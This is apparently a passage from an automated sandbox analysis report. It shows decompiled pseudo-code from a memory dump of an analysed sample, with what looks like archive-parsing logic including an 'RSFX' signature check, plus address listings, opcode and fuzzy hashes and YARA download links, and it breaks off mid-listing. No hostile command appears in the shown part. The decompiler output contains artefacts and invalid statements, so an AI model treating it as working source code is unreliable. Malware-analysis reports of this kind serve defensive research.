														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E00CAFAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E00CA391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
																		goto L67;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L68;
																	}
																	L60:
																	E00CA1E3B(_t199);
																	continue;
																}
																__eflags =  *((char*)(_t199 + 0x6cb5));
																if( *((char*)(_t199 + 0x6cb5)) == 0) {
																	L56:
																	_t138 = 0;
																	__eflags = 0;
																	L57:
																	 *((char*)(_t199 + 0x6cb9)) = _t138;
																	goto L60;
																}
																__eflags =  *((char*)(_t199 + 0x5668));
																if( *((char*)(_t199 + 0x5668)) != 0) {
																	goto L56;
																}
																_t138 = _t166;
																goto L57;
															}
															goto L68;
														}
														__eflags =  *((char*)(_t199 + 0x6cbc));
														if( *((char*)(_t199 + 0x6cbc)) != 0) {
															goto L69;
														}
														goto L51;
													} else {
														L46:
														_t119 = 0;
														L73:
														L74:
														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
														return _t119;
													}
												}
												__eflags = _t116;
												if(_t116 != 0) {
													goto L48;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t207 + 8));
											if( *((char*)(_t207 + 8)) == 0) {
												goto L46;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t207 - 0xd)) = 0;
										while(1) {
											E00CA1E3B(_t199);
											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
											__eflags = _t143 - _t166;
											if(_t143 == _t166) {
												break;
											}
											__eflags =  *((char*)(_t199 + 0x21e0));
											if( *((char*)(_t199 + 0x21e0)) == 0) {
												L37:
												_t144 = E00CA391A(_t199, _t197);
												__eflags = _t144;
												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
												 *(_t207 - 0xe) = _t145;
												__eflags = _t145 - 1;
												if(_t145 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t143 - 4;
											if(_t143 == 4) {
												break;
											}
											goto L37;
										}
										_t116 = _t166;
										goto L39;
									}
									_t205 = _t199 + 0x21ff;
									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
									__eflags = _t147 - _t166;
									if(_t147 != _t166) {
										goto L46;
									}
									__eflags =  *_t205;
									if( *_t205 != 0) {
										goto L46;
									}
									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
									goto L32;
								}
								E00CA134C(__eflags, 0x3c, _t199 + 0x1e);
								goto L46;
							}
							E00CA159C(_t176);
							goto L46;
						} else {
							goto L6;
						}
						do {
							L6:
							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
							__eflags =  *_t190 - 0x52;
							if( *_t190 != 0x52) {
								goto L17;
							}
							_t152 = E00CA1D09(_t190, _t110 - _t202);
							__eflags = _t152;
							if(_t152 == 0) {
								L16:
								_t110 =  *(_t207 - 0x14);
								goto L17;
							}
							_t191 =  *((intOrPtr*)(_t207 - 0x18));
							 *(_t199 + 0x6cb0) = _t152;
							__eflags = _t152 - _t166;
							if(_t152 != _t166) {
								L19:
								_t197 =  *_t199;
								_t153 = _t202 + _t191;
								 *(_t199 + 0x6cc0) = _t153;
								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
								_t155 =  *(_t199 + 0x6cb0);
								__eflags = _t155 - 2;
								if(_t155 == 2) {
									L21:
									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t155 - 3;
								if(_t155 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t202;
							if(_t202 <= 0) {
								goto L19;
							}
							__eflags = _t191 - 0x1c;
							if(_t191 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t207 - 0x14) - 0x1f;
							if( *(_t207 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
							if( *((char*)(_t159 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
							if( *((char*)(_t159 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
							if( *((char*)(_t159 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
							if( *((char*)(_t159 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t202 = _t202 + 1;
							__eflags = _t202 - _t110;
						} while (_t202 < _t110);
						goto L22;
					}
					 *(_t199 + 0x6cb0) = _t106;
					_t166 = 1;
					__eflags = _t106 - 1;
					if(_t106 == 1) {
						_t206 =  *_t199;
						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
						asm("sbb edx, 0x0");
						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
					}
					goto L25;
				}
				_t119 = 0;
				goto L74;
			}




































                0x00ca1973
                0x00ca1973
                0x00ca1978
                0x00ca1982
                0x00ca1984
                0x00ca1988
                0x00ca198e
                0x00ca198f
                0x00ca1996
                0x00ca19a3
                0x00ca19ac
                0x00ca19b7
                0x00ca19bc
                0x00ca19be
                0x00ca19f4
                0x00ca19fd
                0x00ca1a01
                0x00ca1a07
                0x00ca1a12
                0x00ca1a15
                0x00ca1a1a
                0x00ca1a1c
                0x00ca1a1e
                0x00ca1a21
                0x00ca1a22
                0x00ca1a24
                0x00ca1ab9
                0x00ca1ab9
                0x00ca1ac0
                0x00ca1ac3
                0x00ca1acf
                0x00ca1acf
                0x00ca1acf
                0x00ca1ad3
                0x00ca1ad8
                0x00ca1ad8
                0x00ca1ade
                0x00ca1ae1
                0x00ca1af3
                0x00ca1af6
                0x00ca1b24
                0x00ca1b2e
                0x00ca1b32
                0x00ca1b3a
                0x00ca1b3f
                0x00ca1b42
                0x00ca1b44
                0x00ca1b7d
                0x00ca1b7d
                0x00ca1b80
                0x00ca1b80
                0x00ca1b86
                0x00ca1b88
                0x00ca1b90
                0x00ca1b90
                0x00ca1b97
                0x00ca1b9d
                0x00ca1b9d
                0x00ca1b9f
                0x00ca1ba7
                0x00ca1ba7
                0x00ca1bac
                0x00ca1bb0
                0x00ca1bbd
                0x00ca1bbd
                0x00ca1bc7
                0x00ca1bcd
                0x00ca1cc5
                0x00ca1cc5
                0x00ca1ccc
                0x00ca1cd7
                0x00ca1ce7
                0x00ca1cec
                0x00ca1cec
                0x00000000
                0x00ca1cec
                0x00ca1cce
                0x00ca1cd5
                0x00000000
                0x00000000
                0x00000000
                0x00ca1cd5
                0x00ca1bd3
                0x00ca1bda
                0x00ca1be9
                0x00ca1bf0
                0x00ca1bf2
                0x00ca1bfb
                0x00ca1c04
                0x00ca1c0d
                0x00ca1c16
                0x00ca1c1f
                0x00ca1c60
                0x00ca1c62
                0x00ca1c67
                0x00ca1c69
                0x00000000
                0x00000000
                0x00ca1c24
                0x00ca1c2a
                0x00ca1c2d
                0x00ca1c4f
                0x00ca1c52
                0x00ca1c6d
                0x00ca1c74
                0x00ca1c83
                0x00ca1c83
                0x00ca1c83
                0x00ca1c85
                0x00ca1c85
                0x00ca1c8b
                0x00ca1c90
                0x00ca1c99
                0x00ca1ca2
                0x00ca1cab
                0x00ca1cb9
                0x00ca1cc2
                0x00000000
                0x00ca1cc2
                0x00ca1c76
                0x00ca1c7d
                0x00000000
                0x00000000
                0x00ca1c7f
                0x00000000
                0x00ca1c7f
                0x00ca1c54
                0x00ca1c57
                0x00000000
                0x00000000
                0x00ca1c59
                0x00ca1c5b
                0x00000000
                0x00ca1c5b
                0x00ca1c2f
                0x00ca1c36
                0x00ca1c45
                0x00ca1c45
                0x00ca1c45
                0x00ca1c47
                0x00ca1c47
                0x00000000
                0x00ca1c47
                0x00ca1c38
                0x00ca1c3f
                0x00000000
                0x00000000
                0x00ca1c41
                0x00000000
                0x00ca1c41
                0x00000000
                0x00ca1c6b
                0x00ca1bdc
                0x00ca1be3
                0x00000000
                0x00000000
                0x00000000
                0x00ca1bb2
                0x00ca1bb2
                0x00ca1bb2
                0x00ca1cee
                0x00ca1cef
                0x00ca1cf4
                0x00ca1cfe
                0x00ca1cfe
                0x00ca1bb0
                0x00ca1b99
                0x00ca1b9b
                0x00000000
                0x00000000
                0x00000000
                0x00ca1b9b
                0x00ca1b8a
                0x00ca1b8e
                0x00000000
                0x00000000
                0x00000000
                0x00ca1b8e
                0x00ca1b46
                0x00ca1b48
                0x00ca1b4b
                0x00ca1b4d
                0x00ca1b52
                0x00ca1b58
                0x00ca1b5a
                0x00000000
                0x00000000
                0x00ca1b5c
                0x00ca1b63
                0x00ca1b6a
                0x00ca1b6c
                0x00ca1b71
                0x00ca1b73
                0x00ca1b76
                0x00ca1b79
                0x00ca1b7b
                0x00000000
                0x00000000
                0x00000000
                0x00ca1b7b
                0x00ca1b65
                0x00ca1b68
                0x00000000
                0x00000000
                0x00000000
                0x00ca1b68
                0x00ca1bb9
                0x00000000
                0x00ca1bb9
                0x00ca1afa
                0x00ca1b04
                0x00ca1b07
                0x00ca1b09
                0x00000000
                0x00000000
                0x00ca1b0f
                0x00ca1b12
                0x00000000
                0x00000000
                0x00ca1b18
                0x00000000
                0x00ca1b18
                0x00ca1ae9
                0x00000000
                0x00ca1ae9
                0x00ca1ac5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ca1a2a
                0x00ca1a2a
                0x00ca1a2d
                0x00ca1a2f
                0x00ca1a32
                0x00000000
                0x00000000
                0x00ca1a38
                0x00ca1a3d
                0x00ca1a3f
                0x00ca1a7a
                0x00ca1a7a
                0x00000000
                0x00ca1a7a
                0x00ca1a41
                0x00ca1a44
                0x00ca1a4a
                0x00ca1a4c
                0x00ca1a84
                0x00ca1a84
                0x00ca1a86
                0x00ca1a90
                0x00ca1a96
                0x00ca1a99
                0x00ca1a9f
                0x00ca1aa2
                0x00ca1aa9
                0x00ca1ab6
                0x00000000
                0x00ca1ab6
                0x00ca1aa4
                0x00ca1aa7
                0x00000000
                0x00000000
                0x00000000
                0x00ca1aa7
                0x00ca1a4e
                0x00ca1a50
                0x00000000
                0x00000000
                0x00ca1a52
                0x00ca1a55
                0x00000000
                0x00000000
                0x00ca1a57
                0x00ca1a5b
                0x00000000
                0x00000000
                0x00ca1a60
                0x00ca1a62
                0x00ca1a66
                0x00000000
                0x00000000
                0x00ca1a68
                0x00ca1a6c
                0x00000000
                0x00000000
                0x00ca1a6e
                0x00ca1a72
                0x00000000
                0x00000000
                0x00ca1a74
                0x00ca1a78
                0x00000000
                0x00000000
                0x00000000
                0x00ca1a7d
                0x00ca1a7d
                0x00ca1a7e
                0x00ca1a7e
                0x00000000
                0x00ca1a82
                0x00ca19c2
                0x00ca19c8
                0x00ca19c9
                0x00ca19cb
                0x00ca19d1
                0x00ca19d7
                0x00ca19df
                0x00ca19e4
                0x00ca19e4
                0x00000000
                0x00ca19cb
                0x00ca19a5
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: e08fb526c9345db965c2aac50dc0af7468a815eba7e33f697fde1e5b6ae8c76a
                • Instruction ID: 77eeaa20e01f6bf42cf61286e7f4e46de9702f737fea2e70410856b871fbb767
                • Opcode Fuzzy Hash: e08fb526c9345db965c2aac50dc0af7468a815eba7e33f697fde1e5b6ae8c76a
                • Instruction Fuzzy Hash: 01B1C170A04647AFEB18CF74C484BB9FBE6AF0631CF1C4259E86597281D730AE54DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA81C4, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00CA81C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E00CBD870(E00CD12D2, _t95);
				E00CBD940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E00CA137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00CA9C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E00CA1973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E00CAFAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E00CAB782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00CA6EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E00CAA1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E00CA835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00CB0FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E00CA1E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00CA391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00CA83C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00CA6E03(0xce00e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E00CA162D(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















                0x00ca81c4
                0x00ca81c4
                0x00ca81c4
                0x00ca81c4
                0x00ca81c9
                0x00ca81d3
                0x00ca81d9
                0x00ca81db
                0x00ca81e4
                0x00ca81e9
                0x00ca81f4
                0x00ca8201
                0x00ca8209
                0x00ca820f
                0x00ca8216
                0x00ca8229
                0x00ca8230
                0x00ca8237
                0x00ca823a
                0x00ca823c
                0x00ca8242
                0x00ca8249
                0x00ca8250
                0x00ca8257
                0x00ca825c
                0x00ca8277
                0x00ca8283
                0x00ca828a
                0x00ca828f
                0x00ca8295
                0x00ca829a
                0x00ca829c
                0x00ca82a3
                0x00ca82aa
                0x00ca82af
                0x00ca82b1
                0x00000000
                0x00000000
                0x00ca8264
                0x00ca826a
                0x00ca8270
                0x00ca8270
                0x00ca82b3
                0x00ca82b9
                0x00ca82b9
                0x00ca82bf
                0x00ca82c8
                0x00ca82cd
                0x00ca82d2
                0x00ca82d3
                0x00ca82d4
                0x00ca82dc
                0x00ca82df
                0x00ca82e6
                0x00ca82e6
                0x00ca82e1
                0x00ca82e1
                0x00ca82e4
                0x00000000
                0x00000000
                0x00ca82e4
                0x00ca82ed
                0x00ca82f0
                0x00ca82f7
                0x00ca82f9
                0x00ca8307
                0x00ca8307
                0x00ca830e
                0x00ca830e
                0x00ca8313
                0x00ca8319
                0x00ca831e
                0x00ca831e
                0x00ca8324
                0x00ca8329
                0x00ca832e
                0x00ca8337
                0x00ca833c
                0x00ca833c
                0x00ca831e
                0x00ca8218
                0x00ca821f
                0x00ca821f
                0x00ca8216
                0x00ca8340
                0x00ca8346
                0x00ca8351
                0x00ca835b

                APIs
                • __EH_prolog.LIBCMT ref: 00CA81C9
                  • Part of subcall function 00CA137D: __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA137D: new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CA1973: __EH_prolog.LIBCMT ref: 00CA1978
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: a1fd564dfa50585e3bffd56c1604404e12b37170ff8d2eab7bb651dbb655e0e3
                • Instruction ID: f8254a7918d46d40c129e19264a330dc8d1173fc54dec069af4918ae175fdf79
                • Opcode Fuzzy Hash: a1fd564dfa50585e3bffd56c1604404e12b37170ff8d2eab7bb651dbb655e0e3
                • Instruction Fuzzy Hash: F741B2719406559BDF24EB61C855BFAB378AF02708F0400EAE59AA3093DF745FC8EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB2A7F, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00CB2A7F(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E00CBD870(E00CD1486, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E00CBDB02(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E00CBE920(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E00CBDB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0xce00e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00CB1788);
						_push(E00CB1611);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E00CBD96D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E00CBE920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00CC2B53(0xce00e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0xce00e0 = 0x30c00;
								if(_t39 == 0) {
									E00CA6D3A(0xce00e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}




















                0x00cb2a7f
                0x00cb2a7f
                0x00cb2a84
                0x00cb2a89
                0x00cb2a8a
                0x00cb2a8e
                0x00cb2a90
                0x00cb2a92
                0x00cb2a95
                0x00cb2a9c
                0x00cb2a9d
                0x00cb2aa5
                0x00cb2aa8
                0x00cb2aad
                0x00cb2aad
                0x00cb2ab0
                0x00cb2ab3
                0x00cb2abe
                0x00cb2ac5
                0x00cb2ac7
                0x00cb2aca
                0x00cb2adf
                0x00cb2ae0
                0x00cb2ae5
                0x00cb2ae6
                0x00cb2ae9
                0x00cb2aec
                0x00cb2aee
                0x00cb2af0
                0x00cb2af5
                0x00cb2afa
                0x00cb2afb
                0x00cb2afb
                0x00cb2afe
                0x00cb2b00
                0x00cb2b05
                0x00cb2b06
                0x00cb2b06
                0x00cb2b0b
                0x00cb2b15
                0x00cb2b1c
                0x00cb2b26
                0x00cb2b28
                0x00cb2b2a
                0x00cb2b2d
                0x00cb2b30
                0x00cb2b39
                0x00cb2b40
                0x00cb2b4a
                0x00cb2b4f
                0x00cb2b55
                0x00cb2b58
                0x00cb2b5f
                0x00cb2b5f
                0x00cb2b64
                0x00cb2b64
                0x00cb2b67
                0x00cb2b6c
                0x00cb2b6f
                0x00cb2b6f
                0x00cb2b2d
                0x00cb2b26
                0x00cb2b7a
                0x00cb2b84

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: c784770baeb8f27065feff2a56bc1d03b885c5e7345836b3316dd08a4964acca
                • Instruction ID: 2f1ca57771655732828c4ec46cbc43986d471dbf66623bc6afcb2096af7b3c53
                • Opcode Fuzzy Hash: c784770baeb8f27065feff2a56bc1d03b885c5e7345836b3316dd08a4964acca
                • Instruction Fuzzy Hash: 8221F6B1E40215AFDB14DF74CC41AEBB7A8EF15714F04423AE91AEB681E7709E00C6E8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB9EEF, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00CB9EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E00CBD870(E00CD14E1, _t62);
				_push(_t47);
				E00CBD940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E00CA137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00CA1E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E00CA192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00CC2B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00CBEA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00CA15E3(_t62 - 0x24);
					E00CA162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00CA162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}
















                0x00cb9eef
                0x00cb9eef
                0x00cb9eef
                0x00cb9ef4
                0x00cb9ef9
                0x00cb9eff
                0x00cb9f05
                0x00cb9f06
                0x00cb9f09
                0x00cb9f13
                0x00cb9f16
                0x00cb9f24
                0x00cb9f28
                0x00cb9f33
                0x00cb9f44
